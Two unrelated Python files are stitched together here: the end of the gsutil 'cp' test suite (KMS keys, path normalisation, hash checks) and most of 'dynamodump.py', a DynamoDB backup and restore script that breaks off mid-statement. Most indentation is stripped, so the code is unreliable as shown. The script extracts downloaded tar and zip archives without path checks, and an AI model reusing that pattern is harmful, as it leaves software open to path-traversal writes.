with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
stdout = self.RunGsUtil(['stat', foo_std_suri], return_stdout=True)
self.assertRegexpMatchesWithFlags(stdout,
r'Storage class:\s+STANDARD',
flags=re.IGNORECASE)
def authorize_project_to_use_testing_kms_key(
self, key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME):
# Make sure our keyRing and cryptoKey exist.
keyring_fqn = self.kms_api.CreateKeyRing(
PopulateProjectId(None),
testcase.KmsTestingResources.KEYRING_NAME,
location=testcase.KmsTestingResources.KEYRING_LOCATION)
key_fqn = self.kms_api.CreateCryptoKey(keyring_fqn, key_name)
# Make sure that the service account for our default project is authorized
# to use our test KMS key.
self.RunGsUtil(['kms', 'authorize', '-k', key_fqn])
return key_fqn
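  # The helper above is reused by the KMS tests below; it returns the fully-qualified
  # Cloud KMS key name, e.g. (a sketch with hypothetical project/keyring/key names):
  #   projects/my-project/locations/us-central1/keyRings/my-keyring/cryptoKeys/my-key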
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_no_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key_fqn = self.authorize_project_to_use_testing_kms_key()
# Create the unencrypted object, then copy it, specifying a KMS key for the
# new object.
obj_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo')
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(
['cp', suri(obj_uri),
'%s/%s' % (suri(bucket_uri), obj2_name)])
# Make sure the new object is encrypted with the specified KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK('%s/%s' % (suri(bucket_uri), obj2_name),
key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_local_file(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn)]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_works_with_resumable_upload(self):
resumable_threshold = 1024 * 1024 # 1M
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'a' * resumable_threshold)
obj_name = 'foo'
obj_suri = suri(bucket_uri) + '/' + obj_name
key_fqn = self.authorize_project_to_use_testing_kms_key()
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key_fqn),
('GSUtil', 'resumable_threshold',
str(resumable_threshold))]):
self.RunGsUtil(['cp', fpath, obj_suri])
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj_suri, key_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
def test_kms_key_correctly_applied_to_dst_obj_from_src_with_diff_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
key2_fqn = self.authorize_project_to_use_testing_kms_key(
key_name=testcase.KmsTestingResources.CONSTANT_KEY_NAME2)
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, specifying a different key to be used.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
with SetBotoConfigForTest([('GSUtil', 'encryption_key', key2_fqn)]):
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has the different key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUsesCMEK(obj2_suri, key2_fqn)
@SkipForS3('Test uses gs-specific KMS encryption')
@SkipForXML('Copying KMS-encrypted objects prohibited with XML API')
def test_kms_key_not_applied_to_nonkms_dst_obj_from_src_with_kms_key(self):
bucket_uri = self.CreateBucket()
obj1_name = 'foo'
obj2_name = 'bar'
key1_fqn = self.authorize_project_to_use_testing_kms_key()
obj1_suri = suri(
self.CreateObject(bucket_uri=bucket_uri,
object_name=obj1_name,
contents=b'foo',
kms_key_name=key1_fqn))
# Copy the object to the same bucket, not specifying any KMS key.
obj2_suri = '%s/%s' % (suri(bucket_uri), obj2_name)
self.RunGsUtil(['cp', obj1_suri, obj2_suri])
# Ensure the new object has no KMS key.
with SetBotoConfigForTest([('GSUtil', 'prefer_api', 'json')]):
self.AssertObjectUnencrypted(obj2_suri)
@unittest.skipUnless(
IS_WINDOWS,
'Only Windows paths need to be normalized to use backslashes instead of '
'forward slashes.')
def test_windows_path_with_back_and_forward_slash_is_normalized(self):
# Prior to this test and its corresponding fix, running
# `gsutil cp dir/./file gs://bucket` would result in an object whose name
# was "dir/./file", rather than just "file", as Windows tried to split on
    # the path component separator "\" instead of "/".
tmp_dir = self.CreateTempDir()
self.CreateTempFile(tmpdir=tmp_dir, file_name='obj1', contents=b'foo')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '%s\\./obj1' % tmp_dir, suri(bucket_uri)])
# If the destination path was not created correctly, this stat call should
# fail with a non-zero exit code because the specified object won't exist.
self.RunGsUtil(['stat', '%s/obj1' % suri(bucket_uri)])
def test_cp_minus_m_streaming_upload(self):
"""Tests that cp -m - anything is disallowed."""
stderr = self.RunGsUtil(['-m', 'cp', '-', 'file'],
return_stderr=True,
expected_status=1)
self.assertIn(
'CommandException: Cannot upload from a stream when using gsutil -m',
stderr)
@SequentialAndParallelTransfer
def test_cp_overwrites_existing_destination(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(['cp', suri(key_uri), fpath], return_stderr=True)
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
@SequentialAndParallelTransfer
def test_downloads_are_reliable_with_more_than_one_gsutil_instance(self):
test_file_count = 10
temporary_directory = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=test_file_count)
cp_args = ['cp', suri(bucket_uri, '*'), temporary_directory]
threads = []
for _ in range(2):
thread = threading.Thread(target=self.RunGsUtil, args=[cp_args])
thread.start()
threads.append(thread)
    for t in threads:
      t.join()
self.assertEqual(len(os.listdir(temporary_directory)), test_file_count)
class TestCpUnitTests(testcase.GsUtilUnitTestCase):
"""Unit tests for gsutil cp."""
def testDownloadWithNoHashAvailable(self):
"""Tests a download with no valid server-supplied hash."""
# S3 should have a special message for non-MD5 etags.
bucket_uri = self.CreateBucket(provider='s3')
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
object_uri.get_key().etag = '12345' # Not an MD5
dst_dir = self.CreateTempDir()
log_handler = self.RunCommand('cp', [suri(object_uri), dst_dir],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(2, len(warning_messages))
self.assertRegex(
warning_messages[0], r'Non-MD5 etag \(12345\) present for key .*, '
r'data integrity checks are not possible')
self.assertIn('Integrity cannot be assured', warning_messages[1])
def test_object_and_prefix_same_name(self):
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri,
object_name='foo',
contents=b'foo')
self.CreateObject(bucket_uri=bucket_uri,
object_name='foo/bar',
contents=b'bar')
fpath = self.CreateTempFile()
# MockKey doesn't support hash_algs, so the MD5 will not match.
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
self.RunCommand('cp', [suri(object_uri), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'foo')
def test_cp_upload_respects_no_hashes(self):
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'abcd')
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
log_handler = self.RunCommand('cp', [fpath, suri(bucket_uri)],
return_log_handler=True)
warning_messages = log_handler.messages['warning']
self.assertEquals(1, len(warning_messages))
self.assertIn('Found no hashes to validate object upload',
warning_messages[0])
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with dynalite).
"""
import argparse
import fnmatch
import json
import logging
import os
import shutil
import threading
import datetime
import errno
import sys
import time
import re
import zipfile
import tarfile
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
from urllib.request import urlopen
from urllib.error import URLError, HTTPError
except ImportError:
from urllib2 import urlopen, URLError, HTTPError
import boto.dynamodb2.layer1
from boto.dynamodb2.exceptions import ProvisionedThroughputExceededException
import botocore
import boto3
JSON_INDENT = 2
AWS_SLEEP_INTERVAL = 10 # seconds
LOCAL_SLEEP_INTERVAL = 1 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
MAX_BATCH_WRITE = 25 # DynamoDB limit
SCHEMA_FILE = "schema.json"
DATA_DIR = "data"
MAX_RETRY = 6
LOCAL_REGION = "local"
LOG_LEVEL = "INFO"
DATA_DUMP = "dump"
RESTORE_WRITE_CAPACITY = 25
THREAD_START_DELAY = 1 # seconds
CURRENT_WORKING_DIR = os.getcwd()
DEFAULT_PREFIX_SEPARATOR = "-"
MAX_NUMBER_BACKUP_WORKERS = 25
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
def _get_aws_client(profile, region, service):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = urlopen(METADATA_URL + "placement/availability-zone",
data=None, timeout=5).read().decode()
aws_region = azone[:-1]
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
except HTTPError as e:
logging.exception("Error determining region used for AWS client. Typo in code?\n\n" +
str(e))
sys.exit(1)
if profile:
session = boto3.Session(profile_name=profile)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(service, region_name=aws_region)
return client
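# For example (a sketch; the profile and region names are assumptions):
#   dynamo = _get_aws_client(None, "us-east-1", "dynamodb")
#   s3 = _get_aws_client("backup-profile", "us-east-1", "s3")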
def get_table_name_by_tag(profile, region, tag):
"""
    Return the names of all DynamoDB tables carrying the provided tag (given as KEY=VALUE).
    The profile, if provided, is used to build the STS and DynamoDB connections.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile, region, "sts")
dynamo = _get_aws_client(profile, region, "dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator("list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(region, account_number, table)
table_tags = dynamo.list_tags_of_resource(
ResourceArn=table_arn
)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
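# For example (a sketch; the tag is always passed as KEY=VALUE and the returned
# table names are hypothetical):
#   get_table_name_by_tag("default", "us-east-1", "env=prod")
#   -> ["orders-prod", "users-prod"]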
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile, region, "s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(bucket_object, bucket, bucket_object,
ExtraArgs={
"ServerSideEncryption": "AES256"
})
except botocore.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
    Fetch the backup archive for the given table from S3 and extract it.
    Bucket must exist prior to running this function.
    The object is expected at "<args.dumpPath>/<table>" with suffix .tar.bz2 or .zip.
"""
s3 = _get_aws_client(profile, region, "s3")
    # Default to .zip when no archive type is given so archive_type is always defined
    if archive == "tar":
        archive_type = "tar.bz2"
    else:
        archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(
Bucket=bucket
)
except botocore.exceptions.ClientError as e:
logging.exception("S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e))
sys.exit(1)
try:
contents = s3.list_objects_v2(
Bucket=bucket,
Prefix=args.dumpPath
)
except botocore.exceptions.ClientError as e:
logging.exception("Issue listing contents of bucket " + bucket + "\n\n" + str(e))
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception("Unable to find file to restore from. "
"Confirm the name of the table you're restoring.")
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
    Accepts archive_type of "zip" or "tar" and requires dump_path, the directory to add to the archive.
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception("compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e))
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception("Zip file would be too large. Update code to use Zip64 to continue.")
sys.exit(1)
else:
logging.error("Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file")
return False, None
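# For example (a sketch, assuming a local "dump" directory produced by a backup run):
#   do_archive("tar", "dump")  ->  (True, "dump.tar.bz2")
#   do_archive("zip", "dump")  ->  (True, "dump.zip")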
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
table_list = conn.list_tables(exclusive_start_table_name=last_evaluated_table_name)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info("Cannot find \"./%s\", Now trying current working directory.."
% args.dumpPath)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info("Cannot find \"%s\" directory containing dump files!"
% dump_data_path)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(re.sub(r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0])
.split()[0]):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(r"([A-Z])", r" \1", source_table_name)\
.split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
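# For example (a sketch using the default '-' separator and hypothetical table names):
#   change_prefix("prod-users", "prod*", "staging*", "-")  ->  "staging-users"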
def delete_table(conn, sleep_interval, table_name):
"""
Delete table table_name
"""
if not args.dataOnly:
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(table_name)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
table_exist = False
logging.info(table_name + " table deleted!")
break
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying deletion of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying deletion of " +
table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceInUseException":
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info("Waiting for " + table_name + " table to be deleted.. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#ResourceNotFoundException":
logging.info(table_name + " table deleted.")
pass
else:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(str(len(unprocessed_items)) +
" unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY)))
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info("Max retries reached, failed to processed batch write: " +
json.dumps(unprocessed_items, indent=JSON_INDENT))
logging.info("Ignoring and continuing..")
break
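# For example (a sketch; the item uses DynamoDB's low-level attribute-value format,
# matching the PutRequest entries built in do_restore() below):
#   batch_write(conn, BATCH_WRITE_SLEEP_INTERVAL, "my-table",
#               [{"PutRequest": {"Item": {"id": {"S": "1"}}}}])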
def wait_for_active_table(conn, table_name, verb):
"""
    Wait for table to be in the desired state
"""
while True:
if conn.describe_table(table_name)["Table"]["TableStatus"] != "ACTIVE":
logging.info("Waiting for " + table_name + " table to be " + verb + ".. [" +
conn.describe_table(table_name)["Table"]["TableStatus"] + "]")
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(conn, table_name, read_capacity, write_capacity, wait=True):
"""
Update provisioned throughput on the table to provided values
"""
logging.info("Updating " + table_name + " table read capacity to: " +
str(read_capacity) + ", write capacity to: " + str(write_capacity))
while True:
try:
conn.update_table(table_name,
{"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity)})
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying updating throughput of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying updating throughput"
"of " + table_name + "..")
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity)}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(table_attribute_definitions, table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, retrying creation of " +
table_name + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info("Recreation of " + table_name + " completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = \
table_desc["Table"]["ProvisionedThroughput"]["WriteCapacityUnits"]
# override table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo, table_name,
read_capacity, original_write_capacity)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
scanned_table = dynamo.scan(table_name,
exclusive_start_key=last_evaluated_key)
except ProvisionedThroughputExceededException:
logging.error("EXCEEDED THROUGHPUT ON TABLE " +
table_name + ". BACKUP FOR IT IS USELESS.")
tableQueue.task_done()
f = open(
args.dumpPath + os.sep + table_name + os.sep + DATA_DIR + os.sep +
str(i).zfill(4) + ".json", "w+"
)
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if read_capacity is not None and read_capacity != original_read_capacity:
update_provisioned_throughput(dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False)
logging.info("Backup for " + table_name + " table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
tableQueue.task_done()
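# The backup above produces the on-disk layout that do_restore() below expects,
# e.g. (with the default --dumpPath of "dump" and a hypothetical table name):
#   dump/my-table/schema.json
#   dump/my-table/data/0001.json
#   dump/my-table/data/0002.json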
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info("Starting restore for " + source_table + " to " + destination_table + "..")
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info("Cannot find \"./%s/%s\", Now trying current working directory.."
% (args.dumpPath, source_table))
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info("Cannot find \"%s/%s\" directory containing dump files!"
% (CURRENT_WORKING_DIR, source_table))
sys.exit(1)
table_data = json.load(open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE))
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
original_gsi_write_capacities.append(gsi["ProvisionedThroughput"]["WriteCapacityUnits"])
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# temp provisioned throughput for restore
table_provisioned_throughput = {"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(write_capacity)}
if not args.dataOnly:
logging.info("Creating " + destination_table + " table with temp write capacity of " +
str(write_capacity))
while True:
try:
dynamo.create_table(table_attribute_definitions, table_table_name, table_key_schema,
table_provisioned_throughput, table_local_secondary_indexes,
table_global_secondary_indexes)
break
except boto.exception.JSONResponseError as e:
if e.body["__type"] == "com.amazonaws.dynamodb.v20120810#LimitExceededException":
logging.info("Limit exceeded, retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
elif e.body["__type"] == "com.amazon.coral.availability#ThrottlingException":
logging.info("Control plane limit exceeded, "
"retrying creation of " + destination_table + "..")
time.sleep(sleep_interval)
else:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
write_capacity,
False)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(dump_data_path + os.sep + source_table +
os.sep + DATA_DIR + os.sep)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep + data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug("Writing next " + str(MAX_BATCH_WRITE) +
" items to " + destination_table + "..")
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if int(write_capacity) != original_write_capacity:
update_provisioned_throughput(dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
if original_gsi_write_capacity != wcu:
gsi_data.append({
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits":
int(rcu),
"WriteCapacityUnits": int(original_gsi_write_capacity)
}
}
})
logging.info("Updating " + destination_table +
" global secondary indexes write capacities as necessary..")
while True:
try:
dynamo.update_table(destination_table,
global_secondary_index_updates=gsi_data)
break
except boto.exception.JSONResponseError as e:
if (e.body["__type"] ==
"com.amazonaws.dynamodb.v20120810#LimitExceededException"):
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
elif (e.body["__type"] ==
"com.amazon.coral.availability#ThrottlingException"):
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + "..")
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info("Restore for " + source_table + " to " + destination_table +
